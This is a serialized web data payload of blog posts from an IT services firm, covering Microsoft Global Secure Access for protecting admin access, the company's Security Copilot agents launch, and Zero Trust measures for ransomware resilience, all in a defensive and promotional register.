dir:\u003C/p> \u003Cul> \u003Cli>Warum Datenqualität und Informationsarchitektur erfolgsentscheidend sind\u003C/li> \u003Cli>Wie du deine Microsoft 365 Umgebung fit für produktive Agents machst\u003C/li> \u003Cli>Und welche Stellschrauben du heute drehen musst, damit dein Unternehmen morgen von KI wirklich profitiert\u003C/li> \u003C/ul> ","space-top-2 space-bottom-2 mt-10",{"menuItems":27359},[27360,27363,27366,27369,27372,27375],{"href":27361,"text":27362},"#why-your-infrastructure-data-matters","Why Infrastructure Matters",{"href":27364,"text":27365},"#_10-steps-to-improve-your-m365-data-infrastructure-now","10 Steps for M365 Data",{"href":27367,"text":27368},"#understanding-differences-between-agent-platforms","Understanding Agent Platform",{"href":27370,"text":27371},"#rag-retrieval-augumented-generation-vs-sharepoint-vs-upload","RAG vs. SharePoint vs. Upload",{"href":27373,"text":27374},"#microsoft-365-copilot-copilot-agents-security-compliance-out-of-the-box","M365 Copilot: Security",{"href":27376,"text":27377},"#best-practices-to-prepare-further-sharepoint-online-for-agent-use","SharePoint Best Practices",[27379,27381],{"lang":2183,"href":27380},"/de/posts/2025-08-26-agent-ready-infrastructure",{"lang":9114,"href":27382},"/es/posts/2025-08-26-agent-ready-infrastructure",{"noMargin":415},{"slick":415},"/posts/2025-08-28-agent-ready-infrastructure",{"title":26633,"description":402},"posts/2025-08-28-agent-ready-infrastructure",[12157,27389,27390,27391],"M365 Data Governance","SharePoint Security","AI Data Preparation","MFq3O2_t_9-PUsJpotgGWQUvZeA4iFIzziBa46ujgFg",{"id":27394,"title":27395,"author":27396,"body":27397,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":27609,"moment":3,"navigation":415,"path":27639,"seo":27640,"stem":27641,"tags":27642,"webcast":406,"__hash__":27643},"content_de/posts/2025-09-25-gsa-unlocked.md","Global Secure Access Unlocked",[102,260],{"type":350,"value":27398,"toc":27595},[27399,27403,27405,27408,27411,27414,27418,27420,27423,27428,27431,27436,27439,27444,27448,27450,27453,27457,27459,27462,27465,27468,27471,27476,27480,27482,27485,27493,27498,27502,27504,27507,27510,27513,27518,27522,27524,27527,27530,27533,27538,27542,27544,27547,27550,27553,27561,27564,27569,27573,27575,27578,27581,27585,27587,27589,27592],[2548,27400,27402],{"id":27401},"what-is-a-managed-red-tenant","What is a Managed Red Tenant?",[353,27404,9352],{},[353,27406,27407],{},"The Managed Red Tenant combines our extensive experience in managed services with proven blueprints in the areas of workplace, Azure, and security.",[353,27409,27410],{},"The result: An isolated, fully cloud-based as-code managed environment that effectively protects administrative users and endpoints – even in target environments with multiple Microsoft Entra tenants and Active Directory domains.",[353,27412,27413],{},"Our solution relies on native, cloud-based identity and security features from Microsoft and strictly adheres to Zero Trust principles.",[629,27415,27417],{"id":27416},"global-secure-access-as-security-service-edge","Global Secure Access as Security Service Edge",[353,27419,10713],{},[353,27421,27422],{},"We have integrated the latest innovations from Global Secure Access into various components of the Managed Red Tenant to enhance security when accessing Virtual Access Workstations (VAWs) and to protect and restrict outgoing privileged access.",[353,27424,27425],{},[433,27426,27427],{},"Microsoft Entra Internet Access",[353,27429,27430],{},"functioning as an identity-centric Secure Web Gateway (SWG), has been implemented to block public internet access and restrict connectivity to privileged interfaces and the authorized company’s tenant environments only. Additional features, such as Universal Conditional Access Evaluation (CAE), enable near real-time access blocking.",[353,27432,27433],{},[433,27434,27435],{},"Microsoft Entra Private Access",[353,27437,27438],{},"serves as an identity-centric Zero Trust Network Access (ZTNA) solution and is the core of our approach to providing secure and private access to VAWs. Its integration into our solution adds an extra layer of protection for privileged sessions on AVD-based endpoints by enforcing Conditional Access on the accessing client before establishing connectivity to the VAW. Securing access and applying Zero Trust principle to manage private or on-premises resources is another use cases where we take benefit of Private Access.",[353,27440,27441],{},[356,27442],{"alt":12245,"src":27443},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-01.png",[2548,27445,27447],{"id":27446},"use-cases-for-global-secure-access-in-the-managed-red-tenant","Use Cases for Global Secure Access in the Managed Red Tenant",[353,27449,9352],{},[353,27451,27452],{},"Global Secure Access is one of the core components in the design of our Managed Red Tenant, and we’re excited to elevate both security and usability to a new level. The added value becomes most evident when looking at the individual use cases, which we’ll showcase in this blog.",[629,27454,27456],{"id":27455},"access-to-virtual-access-workstations","Access to Virtual Access Workstations",[353,27458,10713],{},[353,27460,27461],{},"Some organizations choose not to equip all administrators with physical Privileged Admin Workstations (PAWs). For these low-privileged admins, we offer what we call Virtual Access Workstations (VAWs).",[353,27463,27464],{},"The most critical aspect here is secure access to the VAWs, and we consider it essential to establish a high level of security—where Entra Private Access plays a key role.",[353,27466,27467],{},"Administrators connect to the VAWs from their enterprise devices and sign in using their account from the Managed Red Tenant. Because of this identity switch, the accessing user is sourced from a different tenant than the the original device and will not able to present a device compliance status.",[353,27469,27470],{},"Therefore, we are using global secure access for pre-authentication using the original user from the device. Since our VAWs do not expose public endpoints and are only accessible via Entra Private Access, we can secure network access to a very high degree. Conditional Access in the workforce environment enforces strong user and device authentication, including device compliance and risk-based controls.",[353,27472,27473],{},[356,27474],{"alt":12245,"src":27475},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-02.png",[629,27477,27479],{"id":27478},"secure-web-filtering","Secure Web Filtering",[353,27481,10713],{},[353,27483,27484],{},"A key characteristic of administrative devices is their strictly limited access to applications, designed to minimize the attack surface as much as possible. While local solutions such as proxy.pac files or shared centralized proxies (not T0 exclusive) were commonly used in the past, we’ve opted for Entra Internet Access for devices within the Managed Red Tenant.",[367,27486,27487,27490],{},[370,27488,27489],{},"Internet access is only permitted from compliant devices and after strong user authentication",[370,27491,27492],{},"Access is restricted to explicitly approved URLs, and since HTTPS traffic (where possible) is decrypted and inspected, it’s also feasible to limit access to specific paths—for example, within Azure DevOps or GitHub",[353,27494,27495],{},[356,27496],{"alt":12245,"src":27497},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-03.png",[629,27499,27501],{"id":27500},"tenant-restrictions-for-saas-services-and-administrative-interfaces","Tenant Restrictions for SaaS Services and Administrative Interfaces",[353,27503,10713],{},[353,27505,27506],{},"In SaaS services and administrative interfaces, it’s common for URLs to be identical across all tenants, which makes them difficult to control using the web filtering methods described above.",[353,27508,27509],{},"To ensure that only accounts from the Managed Red Tenant can sign in to Microsoft’s approved portals from an administrative device, we leverage the Tenant Restriction feature of Global Secure Access.",[353,27511,27512],{},"Through Entra Internet Access, Entra ID is signaled which tenants are permitted for sign-in. This guarantees that all policies from the Managed Red Tenant are enforced and that administrative access occurs exclusively via B2B collaboration.",[353,27514,27515],{},[356,27516],{"alt":12245,"src":27517},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-04.png",[629,27519,27521],{"id":27520},"on-premises-access","On-Premises Access",[353,27523,10713],{},[353,27525,27526],{},"Of course, a Managed Red Tenant can also be used to administer on-premises and IaaS environments, which requires secure access to the datacenters. Entra Private Access provides us with Zero Trust Network Access that combines top-tier security standards with a flexible architecture and strong performance.",[353,27528,27529],{},"Access to datacenters and IaaS environments depends on robust user and device authentication, including device compliance and risk-based controls.",[353,27531,27532],{},"Managing individual targets as app segments enables granular access control, which is automated using Entra Governance features. This extends functions already widely used in the Managed Red Tenant—such as Just-In-Time administration and approval workflows—into the network layer.",[353,27534,27535],{},[356,27536],{"alt":12245,"src":27537},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-05.png",[629,27539,27541],{"id":27540},"revocation-access-in-near-real-time","Revocation Access in Near Real-Time",[353,27543,10713],{},[353,27545,27546],{},"Zero Trust also means being prepared to quickly and effectively contain threats—even within the most secure architecture—and to isolate compromised components.",[353,27548,27549],{},"In a Managed Red Tenant environment, we’re not only prepared for the compromise of users and devices within the tenant itself, but also for the (most likely) scenario where an attack originates from an admin’s office PC and then propagates to the Virtual Admin Workstation.",[353,27551,27552],{},"Thanks to the Universal Continuous Access Evaluation (CAE) feature in Global Secure Access, the following actions are automatically triggered:",[367,27554,27555,27558],{},[370,27556,27557],{},"Access to the Virtual Admin Workstation via Entra Private Access is interrupted if, for example, the user risk level of the account in the Workforce Tenant is set to High",[370,27559,27560],{},"Access to admin interfaces and the datacenter environment is revoked if, for example, the sessions of the account in the Managed Red Tenant are terminated",[353,27562,27563],{},"Additionally, full isolation of all devices and accounts within the Managed Red Tenant can be initiated at any time by the integrated CSOC service.",[353,27565,27566],{},[356,27567],{"alt":12245,"src":27568},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-06.png",[629,27570,27572],{"id":27571},"enriched-sign-ins-and-token-insights","Enriched Sign-Ins and Token Insights",[353,27574,10713],{},[353,27576,27577],{},"Beyond its many features for access control, Global Secure Access is a true game changer when it comes to logging. We gain significantly more telemetry from the network layer and can correlate it with existing sign-in and audit logs.",[353,27579,27580],{},"This enables our CSOC to identify which actions were still performed after containment was triggered—for example, in cases where not all tokens supported Continuous Access Evaluation (CAE).",[353,27582,27583],{},[356,27584],{"alt":12245,"src":27568},[2548,27586,27266],{"id":27265},[353,27588,9352],{},[353,27590,27591],{},"This blog is published alongside a webcast where we explore the Managed Red Tenant, Global Secure Access, the integration process, and the relevant use cases, supported by live demos.",[353,27593,27594],{},"If this blog has sparked your interest, we definitely encourage you to check out the webcast. And of course, we’re always happy to hear from you directly!",{"title":402,"searchDepth":403,"depth":403,"links":27596},[27597,27600,27608],{"id":27401,"depth":403,"text":27402,"children":27598},[27599],{"id":27416,"depth":704,"text":27417},{"id":27446,"depth":403,"text":27447,"children":27601},[27602,27603,27604,27605,27606,27607],{"id":27455,"depth":704,"text":27456},{"id":27478,"depth":704,"text":27479},{"id":27500,"depth":704,"text":27501},{"id":27520,"depth":704,"text":27521},{"id":27540,"depth":704,"text":27541},{"id":27571,"depth":704,"text":27572},{"id":27265,"depth":403,"text":27266},{"lang":2183,"seoTitle":27610,"titleClass":7896,"date":27611,"categories":27612,"blogtitlepic":27613,"socialimg":27614,"customExcerpt":27615,"keywords":27616,"maxContent":415,"textImageTeaser":27617,"asideNav":27626,"hreflang":27634,"footer":27637,"scripts":27638,"published":415},"Securing Microsoft 365 Admin Access with Entra and Global Secure Access","2025-09-25",[1117],"head-gsa-unlocked.jpg","/blog/heads/head-gsa-unlocked.jpg","This blog explores how Microsoft Global Secure Access enhances security and control in our Managed Red Tenant. With Entra Internet Access and Private Access, organizations can secure admin sessions, enforce Zero Trust, and streamline access to cloud and on-prem resources. Real-world use cases and architecture insights show how to protect M365 environments effectively.","Microsoft Global Secure Access, Entra Internet Access, Entra Private Access, Managed Red Tenant, Zero Trust, M365 security, conditional access, admin access control, secure web filtering, virtual admin workstations, CAE, tenant restrictions, Microsoft 365, cloud security",{"image":27618,"cloudinary":415,"alt":27619,"bgColor":7651,"offset":415,"white":415,"list":27620,"left":406,"float":406,"firstColWidth":13492,"secondColWidth":13493,"copyClasses":13494,"headline":27624,"subline":27625,"spacing":27357},"/icons/shape-managed-red-tenant.svg","Copilot Icon",[27621],{"ctaText":27622,"ctaHref":27623,"ctaType":8004,"external":415},"Watch the full session on YouTube","https://youtu.be/SpEOIdoA-uc","Global Secure Access Unlocked: Real World Implementation in Managed Red Tenant","\u003Cp>In the Managed Red Tenant, we enforce strict separation for privileged access. Live demos will show how we secure admin workflows using Global Secure Access.\u003Cbr /> \u003Cbr /> In our English-language session, you’ll learn:\u003C/p> \u003Cul> \u003Cli>How PAWs and VAWs with identity switching create secure admin workstations\u003C/li> \u003Cli>How Tenant Restrictions and Cross-Tenant Access Policies allow only authorized access\u003C/li> \u003Cli>How Per-App Tunnels and Continuous Access Evaluation are replacing traditional VPNs\u003C/li> \u003Cli>How Just-in-Time administration works in practice with Microsoft PIM\u003C/li> \u003C/ul> ",{"menuItems":27627},[27628,27630,27632],{"href":27629,"text":27402},"#what-is-a-managed-red-tenant",{"href":27631,"text":27447},"#use-cases-for-global-secure-access-in-the-managed-red-tenant",{"href":27633,"text":27266},"#final-thoughts",[27635,27636],{"lang":2183,"href":27380},{"lang":9114,"href":27382},{"noMargin":415},{"slick":415},"/posts/2025-09-25-gsa-unlocked",{"title":27395,"description":402},"posts/2025-09-25-gsa-unlocked",[12157,27389,27390,27391,10483],"cakUHqaQGWiHVrfynCXOL1BXN9OReBxqjUpRmiFrBFw",{"id":27645,"title":27646,"author":27647,"body":27648,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":27759,"moment":3,"navigation":415,"path":27808,"seo":27809,"stem":27810,"tags":27811,"webcast":406,"__hash__":27815},"content_de/posts/2025-09-30-security-store.md","Als einer der Ersten weltweit: glueckkanja Security Copilot Agents",[191],{"type":350,"value":27649,"toc":27753},[27650,27654,27656,27659,27661,27664,27667,27670,27673,27677,27684,27686,27696,27707,27725,27736,27743,27747],[2548,27651,27653],{"id":27652},"zum-start-des-microsoft-security-store-stellte-glueckkanja-10-security-copilot-agents-vor","Zum Start des Microsoft Security Store stellte glueckkanja 10 Security Copilot Agents vor",[353,27655,9352],{},[353,27657,27658],{},"Offenbach am Main, 30. September 2025 – glueckkanja ist ab sofort Teil des Microsoft Security Store Partner-Ökosystems. Als einer der allerersten Partner wurde glueckkanja ausgewählt – dank langjähriger Erfahrung mit Microsoft Security-Technologien, Innovationsfreude und der engen Zusammenarbeit mit Microsoft.",[9300,27660],{":quotes":9300,":no-fullscreen":7391},[2559,27662],{"style":27663},"padding-top:50px;",[353,27665,27666],{},"Wir arbeiten eng mit Microsoft zusammen und bringen unsere Erfahrung sowie direktes Kundenfeedback in die Weiterentwicklung des Microsoft Security Store ein, ob bei neuen Features, Integrationen oder konkreten Anforderungen aus der Praxis. Mit zertifizierten Lösungen und KI-Agents, die nahtlos in Microsoft-Security-Produkte integriert sind, erleichtern wir Unternehmen den Zugang zu vertrauenswürdigen Technologien: schnell gefunden, einfach gekauft, sofort produktiv eingesetzt. Über den Security Store helfen wir dir, Ergebnisse zu beschleunigen und den Betrieb zu vereinfachen mit geprüften, leicht ausrollbaren Lösungen, die perfekt zusammenspielen.",[353,27668,27669],{},"Der Microsoft Security Store bietet dir einen zentralen Ort, um Security-Lösungen und KI-Agents zu entdecken, zu erwerben und bereitzustellen. Zertifizierte Integrationen, transparente Abrechnung und schnelle Implementierung stärken deine Security und schaffen Freiraum fürs Wesentliche.",[353,27671,27672],{},"Damit setzt der Microsoft Security Store neue Maßstäbe für die einfache Beschaffung und den effizienten Betrieb von Cybersecurity-Lösungen. Durch die Bündelung verschiedenster Technologien lassen sich moderne Security-Ansätze schneller entdecken, nutzen und produktiv machen. Features wie Framework-Alignment, einfache Abrechnung und geführte Bereitstellung helfen Security-Teams, Komplexität zu reduzieren, Innovationen schneller einzusetzen und den Wert ihrer Investitionen voll auszuschöpfen.",[2548,27674,27676],{"id":27675},"mehr-erfahren-im-offiziellen-microsoft-blog","Mehr erfahren im offiziellen Microsoft-Blog:",[353,27678,27679],{},[374,27680,27683],{"href":27681,"rel":27682},"https://techcommunity.microsoft.com/blog/securitycopilotblog/agentic-security-your-way-build-your-own-security-copilot-agents/4454555",[378],"Agentic Security Your Way: Build Your Own Security Copilot Agents",[2548,27685,9202],{"id":9201},[353,27687,27688,27691,27692,27695],{},[433,27689,27690],{},"We Manage and Protect Microsoft Ecosystems at Scale","\nglueckkanja zählt zu den führenden Cloud Managed Service Providern und Top-Microsoft-Partnern für sichere, skalierbare und vollständig ",[433,27693,27694],{},"cloud-native Microsoft-Umgebungen."," Mit einem einheitlichen Blueprint-Ansatz und Infrastructure-as-Code-Methodik beschleunigen wir die digitale Transformation und Cloud-Adoption von Enterprise-Kunden – sicher, konsistent und zukunftsfähig.",[353,27697,27698,27699,27702,27703,27706],{},"Unser Portfolio bietet umfassende Managed Services für ",[433,27700,27701],{},"Microsoft Azure, Microsoft Entra und Microsoft Intune"," – für effizientes Identity & Access Management, modernes Endpoint Management und den Aufbau konformer Zero-Trust-Infrastrukturen. Ergänzt wird das Angebot durch ",[433,27704,27705],{},"24/7 Security Operations"," und Incident Response aus unserem eigenen Cybersecurity Operations Center (SOC) für kontinuierlichen Schutz, schnelle Reaktion und Compliance mit aktuellen Standards.",[353,27708,27709,27710,27712,27713,993,27715,27717,27718,27720,27721,27724],{},"Für ein nahtlos cloud-natives Microsoft-Erlebnis haben wir eigene Tools entwickelt, die Management und Automatisierung radikal vereinfachen: ",[433,27711,9136],{}," für sichere Zusammenarbeit mit Microsoft 365-Daten, ",[433,27714,3696],{},[433,27716,3631],{}," für passwortlose, Intune-integrierte Netzwerkauthentifizierung, ",[433,27719,494],{}," für skalierbare Softwareverteilung und ",[433,27722,27723],{},"TerraProvider"," für vollautomatisierte Bereitstellung von CloudPCs und Hardware-Clients via Intune.",[353,27726,27727,27728,27731,27732,27735],{},"Als einer der ersten Partner weltweit erhielten wir ",[433,27729,27730],{},"Microsoft Verified MXDR","-Zertifizierung – ein Beleg für exzellente Managed Security Operations. Mit rund 250 Cloud-Profis und einer starken Erfolgsbilanz wurden wir mehrfach als Microsoft Worldwide Partner of the Year ausgezeichnet und sind seit 2019 durchgehend im Spitzenfeld des ",[433,27733,27734],{},"ISG Microsoft 365","-Quadranten Deutschland.",[353,27737,27738,27739,27742],{},"Darüber hinaus gehören wir zu Deutschlands TOP 100 Innovatoren und unsere ",[433,27740,27741],{},"herausragende 4,7/5 Kununu-Bewertung"," (Deutschlands führende Arbeitgeberplattform) unterstreicht unsere Kultur von Exzellenz und Mitarbeiterzufriedenheit.",[2548,27744,27746],{"id":27745},"lern-more","Lern more",[353,27748,27749,27750],{},"glueckkanja joins the Microsoft Security Store Partner Ecosystem with 10 Security Copilot Agents. Learn more: ",[374,27751,27681],{"href":27681,"rel":27752},[378],{"title":402,"searchDepth":403,"depth":403,"links":27754},[27755,27756,27757,27758],{"id":27652,"depth":403,"text":27653},{"id":27675,"depth":403,"text":27676},{"id":9201,"depth":403,"text":9202},{"id":27745,"depth":403,"text":27746},{"lang":2183,"seoTitle":27760,"titleClass":7896,"date":27761,"categories":27762,"blogtitlepic":27763,"socialimg":27764,"customExcerpt":27765,"keywords":27766,"maxContent":406,"hreflang":27767,"quotes":27772,"contactInContent":27778,"footer":27806,"scripts":27807,"published":415},"glueckkanja ist Launch-Partner im Microsoft Security Store mit 10 Security Copilot Agents","2025-09-30",[1117],"head-security-agents.jpg","/blog/heads/head-security-agents.jpg","glueckkanja gehört zu den ersten Partnern im Microsoft Security Store Preview und liefert zum Start zehn Microsoft-native Security Copilot Agents für Security, Entra, Intune und Purview. Die Agents wurden in enger Zusammenarbeit mit Kunden entwickelt und sind von Anfang an auf reale Herausforderungen im Security-Alltag zugeschnitten – nahtlos integriert, enterprise-ready und gebaut, um Security Operations einfacher und schneller zu machen.","Microsoft Security Store Preview, Security Copilot Agents, glueckkanja Microsoft Partner, Microsoft-native Sicherheitslösungen, KI-gestützte Cybersecurity-Tools, Entra Security Agents, Intune Security Automation, Purview Compliance Agents, Cloud Security Microsoft Copilot, Microsoft Security Operations vereinfachen",[27768,27770],{"lang":2118,"href":27769},"/en/posts/2025-09-30-security-store",{"lang":9114,"href":27771},"/es/posts/2025-09-30-security-store",{"items":27773},[27774],{"text":27775,"name":27776,"position":27777,"company":422},"Ein Forensic Agent von glueckkanja AG ermöglicht eine tiefgehende Analyse von Defender XDR-Vorfällen und beschleunigt damit Untersuchungen. Der Privileged Admin Watchdog Agent unterstützt zugleich die Umsetzung des „Zero Standing Privilege“-Prinzips, indem er dauerhafte Administratoridentitäten eliminiert. Gemeinsam mit sechs weiteren Agents im Security Store unterstreicht glueckkanja AG, wie Unternehmen ihre Security- und IT-Herausforderungen wirksam meistern können.","Dorothy Li","Corporate Vice President, Security Copilot, Ecosystem and Marketplace",{"quote":415,"infos":27779},{"bgColor":12128,"headline":10059,"subline":27780,"level":2548,"textStyling":9489,"flush":9490,"person":27781,"form":27785},"Du willst wissen, wie unsere 10 Microsoft-nativen Security Copilot Agents deine Security-, Entra-, Intune- und Purview-Operationen vereinfachen? Füll das Formular aus – wir teilen Insights, Demos und Praxisbeispiele, die zu deinem Bedarf passen.",{"image":9327,"cloudinary":415,"alt":27782,"name":164,"quotee":164,"quoteeTitle":27783,"quote":27784},"Porträt von Jan Geisbauer, Head of Security bei glueckkanja","Head of Security","Was unsere Kunden gewinnen, ist Zeit und Klarheit: Security-Teams verbringen weniger Zeit mit manueller Analyse und Troubleshooting – und können sich auf die Bedrohungen konzentrieren, die wirklich zählen. Mit unseren 10 Security Copilot Agents helfen wir ihnen, ihre Security zu stärken, Kosten zu senken und den Alltag direkt in Microsoft Security zu vereinfachen.",{"ctaText":9508,"cta":27786,"method":407,"action":9511,"fields":27787},{"skin":9510},[27788,27790,27792,27794,27795,27797,27798,27800,27802,27803,27804],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":27789},"Bitte gib deinen Namen ein.",{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":27791},"Bitte gib dein Unternehmen ein.",{"label":10941,"type":9523,"id":9523,"required":415,"requiredMsg":27793},"Bitte gib deine E-Mail-Adresse ein.",{"label":13476,"type":13030,"id":13031,"required":406,"requiredMsg":13032},{"label":27796,"type":9527,"id":9528,"required":415,"requiredMsg":9529},"Deine Daten werden gespeichert und zur Bearbeitung deiner Anfrage verwendet. Details findest du in unserer \u003Ca href=\"/de/privacy\">Datenschutzerklärung\u003C/a>.",{"type":9531,"id":13036,"value":1117},{"type":9531,"id":13038,"value":27799},"World",{"type":9531,"id":9532,"value":27801},"Form: Blog Microsoft Security Store | DE",{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},{"type":9531,"id":27805},"jsonData",{"noMargin":415},{"slick":415},"/posts/2025-09-30-security-store",{"title":27646,"description":402},"posts/2025-09-30-security-store",[27812,27813,27814],"AI Agents","Security Copilot","Microsoft Security","WkD5d0dMB7zXu34IcOew28JBeq4-iJNHMPffvb39xW0",{"id":27817,"title":27818,"author":27819,"body":27820,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":27946,"moment":3,"navigation":415,"path":27977,"seo":27978,"stem":27979,"tags":27980,"webcast":406,"__hash__":27981},"content_de/posts/2025-10-07-prevent-cyber-attacks.md","Cyberangriffe verhindern: Wie Unternehmen mit IT-Strukturen Resilienz schaffen",[191],{"type":350,"value":27821,"toc":27937},[27822,27826,27828,27831,27834,27838,27840,27844,27846,27854,27857,27861,27863,27871,27874,27881,27885,27887,27894,27901,27905,27907,27914,27917,27921,27923,27926,27929],[2548,27823,27825],{"id":27824},"warum-cyberangriffe-so-oft-erfolgreich-sind","Warum Cyberangriffe so oft erfolgreich sind",[353,27827,9352],{},[353,27829,27830],{},"Ransomware-Attacken sind kein Zufall. Angreifende wählen gezielt Zeitpunkte, in denen Unternehmen personell unterbesetzt sind – etwa am Wochenende. Sie nutzen Schwachstellen wie veraltete Authentifizierungsprozesse, nicht gepatchte Systeme oder falsch konfigurierte Zugänge aus. Ein häufiger Fehler: Es fehlt an einem einheitlichen Sicherheitskonzept. Statt einer durchdachten Gesamtstrategie arbeiten viele Unternehmen mit Einzelmaßnahmen, die bei komplexen Angriffen nicht ausreichen.",[353,27832,27833],{},"Doch es gibt Ansätze, die sich bewährt haben: ein Sicherheitsmodell, das auf Zero-Trust-Prinzipien basiert, sowie eine klare Strukturierung von Zugriffsrechten und Automatisierung, um im Ernstfall schnell reagieren zu können.",[2548,27835,27837],{"id":27836},"drei-säulen-für-eine-belastbare-it-sicherheitsstrategie","Drei Säulen für eine belastbare IT-Sicherheitsstrategie",[353,27839,9352],{},[2548,27841,27843],{"id":27842},"sichere-infrastruktur-die-basis-für-resilienz","Sichere Infrastruktur – die Basis für Resilienz",[353,27845,10713],{},[353,27847,27848,27849,27853],{},"Eine belastbare IT-Infrastruktur muss nicht nur zuverlässig funktionieren, sondern auch Sicherheitslücken aktiv schließen. In unserem Beispiel mussten 300 Rechner isoliert werden. Der erste Schritt war daher die komplette Neuinstallation einer sauberen Umgebung – basierend auf unserer ",[374,27850,27852],{"href":27851},"https://www.glueckkanja.com/de/azure/azure-foundation?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article"," Azure Foundation",". Diese Cloud-Infrastruktur folgt klaren Sicherheitsrichtlinien und wird mit Infrastructure-as-Code (IaC) standardisiert ausgerollt. So können Sicherheitskonfigurationen nach Best Practices immer wieder automatisiert geprüft und aktualisiert werden.",[353,27855,27856],{},"Ein weiterer Vorteil: Der Einsatz von Zero-Trust-Prinzipien sorgt dafür, dass Workloads segmentiert sind und nur für autorisierte Verbindungen freigegeben werden. So bleibt die Angriffsfläche minimal.",[2548,27858,27860],{"id":27859},"sicherheit-beginnt-bei-der-authentifizierung","Sicherheit beginnt bei der Authentifizierung",[353,27862,10713],{},[353,27864,27865,27866,27870],{},"In fast jedem Cyberangriff ist die Identitätsverwaltung der erste Angriffspunkt. Passwörter allein reichen längst nicht mehr aus. Mit ",[374,27867,27869],{"href":27868},"https://www.glueckkanja.com/de/modern-workplace/azure-active-directory?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","Entra ID"," lassen sich User-Konten zentral verwalten und absichern. Multifaktor-Authentifizierung (MFA) gehört dabei zur Grundausstattung.",[353,27872,27873],{},"Ein weiterer Vorteil: Verdächtige Aktivitäten werden automatisch erkannt und überprüft. Wenn beispielsweise ein User sich nach wenigen Minuten erneut von einem anderen Standort einloggt, wird dies als potenzielle Bedrohung erkannt und der Zugang automatisch gesperrt.",[353,27875,27876,27877,27880],{},"Um Angreifende in der Infrastruktur zu erkennen, kommen erweiterte Systeme wie Extended Detection and Response (XDR) und Security Information and Event Management (SIEM) zum Einsatz. Diese Lösungen bündeln Alarme und Ereignisse, werten sie aus und sorgen für eine schnelle Einordnung. Ein Managed SOC – wie beispielsweise das ",[374,27878,6409],{"href":27879},"https://www.glueckkanja.com/de/security/cloud-security-operations-center?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article "," von glueckkanja – unterstützt dabei, diese Technologien optimal zu nutzen.",[2548,27882,27884],{"id":27883},"arbeitsplätze-schnell-wiederherstellen","Arbeitsplätze schnell wiederherstellen",[353,27886,10713],{},[353,27888,27889,27890,27893],{},"Nach einem Angriff müssen Mitarbeitende schnell wieder arbeitsfähig sein. Dafür sind cloudbasierte Lösungen wie ",[374,27891,4471],{"href":27892},"https://www.glueckkanja.com/de/modern-workplace/microsoft-intune?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article"," essenziell. Über ein zentrales Portal können Geräte vollständig zurückgesetzt und mit allen Konfigurationen ausgestattet werden – unabhängig davon, wo sich der User befindet.",[353,27895,27896,27897,27900],{},"Der Vorteil: Die Mitarbeitenden können den Prozess eigenständig durchführen, ohne dass die IT-Abteilung jedes Gerät manuell aufsetzen muss. Zusätzlich verteilen Plattformen wie ",[374,27898,494],{"href":27899},"https://www.realmjoin.com/?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article"," alle relevanten Softwarepakete automatisiert und stellen sicher, dass Sicherheitsupdates installiert sind.",[2548,27902,27904],{"id":27903},"absicherung-für-den-ernstfall-azere-als-notfalllösung","Absicherung für den Ernstfall: AzERE als Notfalllösung",[353,27906,9352],{},[353,27908,27909,27910,27913],{},"Ein Vorfall wie dieser zeigt, wie wichtig es ist, eine Notfallstrategie parat zu haben. ",[374,27911,10020],{"href":27912},"https://www.glueckkanja.com/de/azure/azure-emergency-response-environment?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","(Azure Emergency Response Environment) bietet eine isolierte Umgebung, in der kritische Systeme wie der Domain Controller in einer sicheren „Dark Tenant“-Instanz repliziert werden. Das ermöglicht den Zugriff auf eine saubere Version der Daten, selbst im Falle eines großflächigen Angriffs.",[353,27915,27916],{},"Zusätzlich ermöglicht AzERE die Einrichtung eines digitalen „War Rooms“: eine Plattform, auf der alle relevanten Stakeholder zusammenkommen, um Maßnahmen in Echtzeit zu koordinieren. Diese zentrale Kommunikationsfähigkeit kann den entscheidenden Unterschied machen, wenn Minuten über Erfolg oder Misserfolg entscheiden.",[2548,27918,27920],{"id":27919},"fazit-proaktive-resilienz-statt-reaktion-auf-bedrohungen","Fazit: Proaktive Resilienz statt Reaktion auf Bedrohungen",[353,27922,9352],{},[353,27924,27925],{},"Der Vorfall zeigt: Ein wirkungsvolles Sicherheitskonzept erfordert mehr als punktuelle Lösungen. Es braucht ein Zusammenspiel aus einer sicheren Cloud-Infrastruktur, einem robusten Identitätsmanagement und einer modernen Arbeitsumgebung, die sich schnell wiederherstellen lässt.",[353,27927,27928],{},"Und genau deshalb erzählen unsere IT Workaholics-Geschichten von Menschen, deren IT-Alltag wir vom Krisenmodus zurück in den Normalbetrieb geholt haben.",[353,27930,27931,27932,27936],{},"Jetzt ",[374,27933,27935],{"href":27934},"https://www.glueckkanja.com/de/it-workaholics?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","IT Workaholics-Geschichten"," 